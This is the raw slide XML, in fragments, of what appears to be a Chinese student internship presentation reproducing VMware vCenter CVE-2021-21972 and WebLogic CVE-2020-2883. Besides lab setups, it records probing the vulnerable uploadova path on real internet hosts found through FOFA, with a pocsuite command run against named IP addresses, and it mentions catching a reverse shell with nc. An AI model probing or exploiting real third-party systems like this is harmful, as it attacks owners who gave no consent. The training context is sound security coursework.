                <a:gd name="T74" fmla="*/ 26 w 35"/>
                <a:gd name="T75" fmla="*/ 20 h 35"/>
                <a:gd name="T76" fmla="*/ 11 w 35"/>
                <a:gd name="T77" fmla="*/ 20 h 35"/>
                <a:gd name="T78" fmla="*/ 10 w 35"/>
                <a:gd name="T79" fmla="*/ 20 h 35"/>
                <a:gd name="T80" fmla="*/ 10 w 35"/>
                <a:gd name="T81" fmla="*/ 30 h 35"/>
                <a:gd name="T82" fmla="*/ 26 w 35"/>
                <a:gd name="T83" fmla="*/ 30 h 35"/>
                <a:gd name="T84" fmla="*/ 26 w 35"/>
                <a:gd name="T85" fmla="*/ 26 h 35"/>
                <a:gd name="T86" fmla="*/ 10 w 35"/>
                <a:gd name="T87" fmla="*/ 26 h 35"/>
                <a:gd name="T88" fmla="*/ 10 w 35"/>
                <a:gd name="T89" fmla="*/ 3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" h="35">
                  <a:moveTo>
                    <a:pt x="1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4" y="9"/>
                    <a:pt x="27" y="6"/>
                    <a:pt x="30" y="2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0" y="7"/>
                    <a:pt x="28" y="9"/>
                    <a:pt x="2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0" y="15"/>
                    <a:pt x="18" y="16"/>
                    <a:pt x="15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6" y="22"/>
                    <a:pt x="4" y="23"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="22"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="12" y="17"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="11"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="20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0" y="20"/>
                    <a:pt x="10" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="30"/>
                    <a:pt x="26" y="30"/>
                    <a:pt x="26" y="3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10" y="26"/>
                    <a:pt x="10" y="26"/>
                    <a:pt x="10" y="26"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1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5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7" descr="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="25965" t="26296"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11124826" y="0"/>
            <a:ext cx="1067174" cy="106474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图片 10" descr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842" y="364340"/>
            <a:ext cx="548055" cy="5760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图片 8" descr="图片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43969" y="6369050"/>
            <a:ext cx="11304001" cy="770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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6463579"/>
            <a:ext cx="9799320" cy="359411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="46799" tIns="46799" rIns="46799" bIns="46799" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr spc="200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sz="1600" dirty="0" smtClean="0"/>
              <a:t>university.360.cn</a:t>
            </a:r>
            <a:endParaRPr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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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0" marR="0" indent="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23900" marR="0" indent="-2667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234440" marR="0" indent="-32004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727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21844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6416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30988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35560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4013200" marR="0" indent="-355600" algn="ctr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595959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hyperlink" Target="https://62.204.61.107/ui/vropspluginui/rest/services/uploadova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tags" Target="../tags/tag45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image" Target="../media/image11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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image" Target="../media/image12.png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9.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28.xml"/><Relationship Id="rId1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image" Target="../media/image15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39.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag38.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37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2705" y="252095"/>
            <a:ext cx="1214120" cy="1219835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982663" y="1952625"/>
            <a:ext cx="10226675" cy="14763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</a:rPr>
              <a:t>南开大学</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>第八小组</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US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982663" y="3429001"/>
            <a:ext cx="10226675" cy="11894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360</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>实习实训项目漏洞解析答辩</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>答辩小组成员：王峥</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>李佳璐</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>陈恩宝</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>王承铃</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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830507" y="1267785"/>
            <a:ext cx="462357" cy="44092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02052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135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</a:rPr>
                <a:t>VMWare vCenter Server </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN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远程代码执行漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1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CVE-2021-21972)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07378" y="1371647"/>
            <a:ext cx="2295205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漏洞复现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7378" y="1772729"/>
            <a:ext cx="7963688" cy="2154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搭建漏洞环境，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0"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根据已知的漏洞信息，尝试重现该漏洞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r="40461"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="496815" y="2153251"/>
            <a:ext cx="3005129" cy="223464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0640" y="4577422"/>
            <a:ext cx="3694421" cy="2154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安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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EXSi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 7.0.0</a:t>
            </a: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，访问其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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地址，进行登录。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3632833" y="3199380"/>
            <a:ext cx="558459" cy="362078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/>
          <a:srcRect r="42126"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297093" y="2153251"/>
            <a:ext cx="3073340" cy="2234642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560223" y="4582844"/>
            <a:ext cx="3694421" cy="2154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给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1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EXSi</a:t>
            </a:r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分配许可证，进行激活。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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="箭头: 右 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7607123" y="3194269"/>
            <a:ext cx="558459" cy="362078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3"/>
          <a:srcRect l="1" t="16339" r="43822"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8319214" y="2153251"/>
            <a:ext cx="3547805" cy="2234642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8165582" y="4469700"/>
            <a:ext cx="3919047" cy="4308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EXSi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上装载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VMWare vCenter Server 7.0.0</a:t>
            </a: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，安装完成后访问其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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地址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496815" y="5310481"/>
            <a:ext cx="558459" cy="362078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" r="34448" b="66822"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292864" y="5001427"/>
            <a:ext cx="4228333" cy="1284338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5856476" y="5119171"/>
            <a:ext cx="4925475" cy="86177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just"/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环境搭建成功后，</a:t>
            </a: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访问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漏洞所在地址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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https://ip/ui/vropspluginui/rest/services/uploadova</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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如果返回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405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，则代表存在</a:t>
            </a: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该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漏洞</a:t>
            </a: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14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en-US" sz="1400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如图，我们复现漏洞成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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830507" y="1267785"/>
            <a:ext cx="462357" cy="44092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02052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135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</a:rPr>
                <a:t>VMWare vCenter Server </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN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远程代码执行漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1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CVE-2021-21972)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07378" y="1371647"/>
            <a:ext cx="2295205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漏洞复现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7378" y="1772729"/>
            <a:ext cx="7963688" cy="2154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搭建漏洞环境，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF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根据已知的漏洞信息，尝试重现该漏洞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01561" y="2768493"/>
            <a:ext cx="3694421" cy="6463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just"/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另外，我们还在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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fofa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上找到了符合条件的外网测试目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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400" kern="1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1400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地址及端口号</a:t>
            </a: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:178.237.192.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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sz="1400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9144</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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801561" y="4892677"/>
            <a:ext cx="4925475" cy="861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just"/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因此，可以直接访问</a:t>
            </a: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漏洞所在地址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zh-CN" altLang="zh-CN" sz="14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1400" u="sng" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://178.237.192.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" u="sng" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" u="sng" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C1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  <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>9144/ui/vropspluginui/rest/services/uploadova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，如图，返回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405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，代表存在漏洞，漏洞复现成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="14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" name="箭头: 左弧形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368426" y="4001389"/>
            <a:ext cx="647338" cy="1178165"/>
          </a:xfrm>
          <a:prstGeom prst="curved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118" y="2227504"/>
            <a:ext cx="5166265" cy="196389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14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345118" y="4430732"/>
            <a:ext cx="5166266" cy="17856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830507" y="1267785"/>
            <a:ext cx="462357" cy="44092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02052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135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</a:rPr>
                <a:t>VMWare vCenter Server </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN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远程代码执行漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1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CVE-2021-21972)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07378" y="1371647"/>
            <a:ext cx="2295205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Poc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验证漏洞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7378" y="1772729"/>
            <a:ext cx="7963688" cy="2154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创建一个简化的、可执行的示例程序或脚本，以证明漏洞的存在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378" y="2112256"/>
            <a:ext cx="4617460" cy="417003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486716" y="2284090"/>
            <a:ext cx="4811340" cy="360098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这段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POC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代码的目的是检测特定版本的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VMware vCenter Server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是否存在未授权的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RCE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漏洞</a:t>
            </a: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验证方法是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通过向目标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 URL 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发送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 HTTP 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请求并检查响应状态码来判断是否存在漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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漏洞的利用路径为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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16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ui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en-US" altLang="zh-CN" sz="16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vropspluginui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/rest/services/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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uploadova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如果状态码为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 405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，表示服务器在该路径上拒绝了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 GET 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方法的请求，即服务器没有限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="16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方法，可以执行恶意操作，漏洞存在。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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830507" y="1267785"/>
            <a:ext cx="462357" cy="44092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02052" y="202518"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr/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96386" y="417310"/>
              <a:ext cx="7088135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</a:rPr>
                <a:t>VMWare vCenter Server </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN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远程代码执行漏洞</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="1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CVE-2021-21972)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07378" y="1371647"/>
            <a:ext cx="2295205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Poc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验证漏洞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07378" y="1772729"/>
            <a:ext cx="7963688" cy="2154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在目标环境下，使用各种方式验证漏洞的存在性，例如渗透测试、漏洞扫描工具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2042" y="4219700"/>
            <a:ext cx="4061116" cy="2154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首先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fofa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上查找符合漏洞存在条件的外网测试目标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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="箭头: 右 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5116535" y="3004327"/>
            <a:ext cx="711614" cy="362078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84409" y="4181087"/>
            <a:ext cx="5773313" cy="2154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kali</a:t>
            </a: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en-US" sz="1400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搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" kern="1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pocsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" kern="1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，可以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pip3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来安</a:t>
            </a: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装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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pocsuite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sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="箭头: 右 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7607123" y="3194269"/>
            <a:ext cx="558459" cy="362078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9" name="箭头: 右 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496815" y="5310481"/>
            <a:ext cx="558459" cy="362078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78430" y="4653315"/>
            <a:ext cx="4316755" cy="1508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just"/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配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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pocsuite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成功后，使用指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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en-US" altLang="zh-CN" sz="14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pocsuite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 -r ./vsphere_client_cve-2021-21972.py -u 27.254.173.10:443  --verify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在目标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URL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上验证是否存在漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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en-US" sz="1400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其中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vsphere_client_cve-2021-21972.py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4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poc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代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" kern="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just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400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如图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为成功在目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN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上找到漏洞的截图</a:t>
            </a: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1400" kern="100" dirty="0" err="1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poc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" kern="10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验证成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" kern="100" dirty="0"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26" y="2120036"/>
            <a:ext cx="5274310" cy="197618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59"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="830507" y="2086884"/>
            <a:ext cx="3853548" cy="2009339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23" y="4534460"/>
            <a:ext cx="5965564" cy="174581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1445260" y="799465"/>
            <a:ext cx="7847330" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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45260" y="1527810"/>
            <a:ext cx="8663305" cy="5143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漏洞介绍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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502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0150" y="2070100"/>
            <a:ext cx="9791700" cy="19519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 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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>在Oracle官方发布的2020年4月关键补丁更新公告CPU（Critical Patch Update）中，两个针对 WebLogic Server ，CVSS 3.0评分为 9.8的严重漏洞（CVE-2020-2883、CVE-2020-2884），允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。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91590" y="4091305"/>
            <a:ext cx="8663305" cy="5143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     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影响范围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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs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0150" y="4542473"/>
            <a:ext cx="5080000" cy="1529715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just" defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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Oracle WebLogic Server 10.3.6.0.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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Oracle WebLogic Server 12.1.3.0.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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Oracle WebLogic Server 12.2.1.3.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Oracle WebLogic Server 12.2.1.4.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090222" y="1416375"/>
            <a:ext cx="462357" cy="44092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任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090222" y="4023685"/>
            <a:ext cx="462357" cy="44092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02052" y="307928"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr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"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2796386" y="417310"/>
              <a:ext cx="7088135" cy="2768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  <a:cs typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>weblogic 反序列化漏洞（CVE-2020-2883）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39545" y="1734185"/>
            <a:ext cx="8515350" cy="5143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</a:pP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V</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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ulfocus</a:t>
            </a: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上创建对应虚拟环境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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31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2955" y="2174875"/>
            <a:ext cx="5869940" cy="3914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578" y="3029585"/>
            <a:ext cx="5263515" cy="19977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720840" y="1734185"/>
            <a:ext cx="4916805" cy="3632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利用所给出端口访问靶机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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="任意多边形: 形状 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830507" y="1656405"/>
            <a:ext cx="462357" cy="44092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组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2602052" y="307928"/>
            <a:ext cx="7282469" cy="803936"/>
            <a:chOff x="2602052" y="202518"/>
            <a:chExt cx="7282469" cy="803936"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 3"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr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2796386" y="417310"/>
              <a:ext cx="7088135" cy="2768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  <a:cs typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:sym typeface="思源黑体 CN Medium" panose="020B0600000000000000" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>weblogic 反序列化漏洞（CVE-2020-2883）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82955" y="1734185"/>
            <a:ext cx="5543550" cy="12960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在攻击机上开启nc监听执行攻击脚本，反弹shell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文隶书" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
